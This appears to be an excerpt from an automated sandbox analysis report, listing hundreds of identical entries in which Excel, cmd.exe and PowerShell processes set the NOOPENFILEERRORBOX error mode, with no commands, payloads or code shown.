          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
